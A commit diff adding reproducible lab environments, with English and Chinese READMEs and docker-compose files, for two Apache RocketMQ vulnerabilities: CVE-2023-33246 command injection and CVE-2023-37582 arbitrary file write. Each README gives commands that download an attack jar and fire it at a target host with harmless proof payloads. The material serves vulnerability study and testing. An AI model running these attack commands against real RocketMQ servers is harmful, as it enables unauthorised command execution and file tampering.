first commit

rocketmq/CVE-2023-33246/README.md

@@ -0,0 +1,42 @@
+# Apache RocketMQ Broker Remote Command Execution (CVE-2023-33246)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
+
+For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x.
+
+References:
+
+- <https://github.com/I5N0rth/CVE-2023-33246>
+- <https://github.com/Le1a/CVE-2023-33246>
+- <https://paper.seebug.org/2081/>
+- <https://xz.aliyun.com/news/12137>
+- <https://xz.aliyun.com/news/12035>
+
+## Vulnerable environment
+
+Use following command to start a RocketMQ broker 5.1.0:
+
+```shell
+docker compose up -d
+```
+
+After the environment is started, the RocketMQ broker will listen on port 10911.
+
+## Exploit
+
+The vulnerability exists in the configuration update functionality of RocketMQ's Broker component. The Broker component lacks proper authentication and input validation in its configuration update interface, allowing attackers to modify configuration values.
+
+What makes this vulnerability particularly dangerous is RocketMQ's filter server mechanism. Every 30 seconds, RocketMQ executes the filter server by running a shell command. This command is constructed by concatenating strings that include the `rocketmqHome` value from the configuration. Since an attacker can control this configuration value and it's used directly in command construction without proper sanitization, this leads to command injection.
+
+I made a simple [exploit project](https://github.com/vulhub/rocketmq-attack) to reproduce the vulnerability and execute arbitrary commands.
+
+```shell
+wget https://github.com/vulhub/rocketmq-attack/releases/download/1.0/rocketmq-attack-1.0-SNAPSHOT.jar
+java -jar rocketmq-attack-1.0-SNAPSHOT.jar AttackBroker --target your-ip:10911 --cmd "touch /tmp/success"
+```
+
+Wait for up to 30 seconds, and you will see the `touch /tmp/success` command has been executed.
+
+![](1.png)

rocketmq/CVE-2023-33246/README.zh-cn.md

@@ -0,0 +1,40 @@
+# Apache RocketMQ Broker 远程命令执行漏洞（CVE-2023-33246）
+
+Apache RocketMQ是一个分布式消息平台。
+
+在其5.1.0版本及以前存在一处命令执行漏洞，攻击者通过向其更新配置相关的功能发送指令即可更新任意配置项，并通过配置项中存在的命令注入功能执行任意命令。
+
+参考链接：
+
+- <https://github.com/I5N0rth/CVE-2023-33246>
+- <https://github.com/Le1a/CVE-2023-33246>
+- <https://paper.seebug.org/2081/>
+- <https://xz.aliyun.com/news/12137>
+- <https://xz.aliyun.com/news/12035>
+
+## 漏洞环境
+
+执行如下命令启动一个RocketMQ broker 5.1.0:
+
+```shell
+docker compose up -d
+```
+
+环境启动后，RocketMQ的Broker将会监听在10911端口。
+
+## 漏洞复现
+
+该漏洞存在于 RocketMQ 的 Broker 组件的配置更新功能中。Broker 组件在配置更新接口中缺乏适当的身份认证和输入验证，攻击者可以修改配置值。
+
+这个漏洞之所以特别危险，是因为 RocketMQ 的 filter server 机制。RocketMQ 每30秒会执行一次 filter server，执行方式是通过运行 shell 命令。这个命令是通过字符串拼接构造的，其中包含了来自配置中的 `rocketmqHome` 值。由于攻击者可以控制这个配置值，且这个值在构造命令时没有经过适当的过滤，因此导致了命令注入漏洞。
+
+我们可以使用这个[简单的项目](https://github.com/vulhub/rocketmq-attack)来复现漏洞并执行任意命令：
+
+```shell
+wget https://github.com/vulhub/rocketmq-attack/releases/download/1.0/rocketmq-attack-1.0-SNAPSHOT.jar
+java -jar rocketmq-attack-1.0-SNAPSHOT.jar AttackBroker --target your-ip:10911 --cmd "touch /tmp/success"
+```
+
+等待最多30秒后，可见`touch /tmp/success`命令已成功执行：
+
+![](1.png)

rocketmq/CVE-2023-33246/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+ rocketmq:
+   image: vulhub/rocketmq:5.1.0
+   ports:
+     - 10911:10911
+     - 5005:5005
+   command: ["mqbroker", "-n", "localhost:9876", "--enable-proxy"]

rocketmq/CVE-2023-37582/README.md

@@ -0,0 +1,44 @@
+# Apache RocketMQ NameServer Arbitrary File Write (CVE-2023-37582)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
+
+In RocketMQ versions 5.1.1 and below, there exists an arbitrary file write vulnerability in the NameServer component. The vulnerability exists in the configuration update functionality of RocketMQ's NameServer component. By sending an `UPDATE_NAMESRV_CONFIG` command to the NameServer, an attacker can modify the `configStorePath` configuration item and its content, leading to arbitrary file write.
+
+This vulnerability arises from an incomplete fix for [CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246). In addressing CVE-2023-33246, the official team established a blocklist of configuration items that cannot be modified. However, the patch mistakenly designated the blocklist as `configStorePathName`, when it should have been `configStorePath`, leading to this outcome.
+
+References:
+
+- <https://github.com/apache/rocketmq/pull/6843>
+- <https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/>
+- <https://github.com/Malayke/CVE-2023-37582_EXPLOIT>
+
+## Vulnerable Environment
+
+Execute the following command to start a RocketMQ NameServer 5.1.0:
+
+```shell
+docker compose up -d
+```
+
+After the environment is started, the RocketMQ NameServer will listen on port 9876.
+
+## Exploit
+
+Use this simple [exploit project](https://github.com/vulhub/rocketmq-attack) to reproduce the vulnerability and write arbitrary file.
+
+```shell
+wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
+java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --path "/tmp/success" --content "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+```
+
+After execution, you can verify that the file has been written successfully:
+
+```shell
+cat /tmp/success
+```
+
+The content "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" should be present in the file.
+
+![](1.png)

rocketmq/CVE-2023-37582/README.zh-cn.md

@@ -0,0 +1,42 @@
+# Apache RocketMQ NameServer 任意文件写入漏洞（CVE-2023-37582）
+
+Apache RocketMQ是一个分布式消息和流处理平台，具有低延迟、高性能和可靠性、万亿级容量和灵活的可扩展性。
+
+在RocketMQ版本5.1.1及以下版本中，NameServer组件存在一个任意文件写入漏洞。该漏洞存在于RocketMQ的NameServer组件的配置更新功能中。通过向NameServer发送`UPDATE_NAMESRV_CONFIG`命令，攻击者可以修改`configStorePath`配置项及其内容，从而导致任意文件写入。
+
+该漏洞源于对[CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246)的不完全修复。在处理CVE-2023-33246时，官方团队建立了一个不能被修改的配置项黑名单。然而，补丁错误地将黑名单指定为`configStorePathName`，而应该是`configStorePath`，导致了这一结果。
+
+参考链接：
+
+- <https://github.com/apache/rocketmq/pull/6843>
+- <https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/>
+- <https://github.com/Malayke/CVE-2023-37582_EXPLOIT>
+
+## 漏洞环境
+
+执行如下命令启动一个RocketMQ NameServer 5.1.0：
+
+```shell
+docker compose up -d
+```
+
+环境启动后，RocketMQ的NameServer将会监听在9876端口。
+
+## 漏洞复现
+
+使用这个[工具](https://github.com/vulhub/rocketmq-attack)来复现漏洞并写入任意文件：
+
+```shell
+wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
+java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --path "/tmp/success" --content "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+```
+
+执行完成后，可以验证文件是否写入成功：
+
+```shell
+cat /tmp/success
+```
+
+可见，内容写入成功：
+
+![](1.png)

rocketmq/CVE-2023-37582/docker-compose.yml

@@ -0,0 +1,12 @@
+services:
+ namesrv:
+   image: vulhub/rocketmq:5.1.0
+   ports:
+     - 9876:9876
+     - 5005:5005
+   command: ["mqnamesrv"]
+ broker:
+   image: vulhub/rocketmq:5.1.0
+   ports:
+     - 10911:10911
+   command: ["mqbroker", "-n", "namesrv:9876", "--enable-proxy"]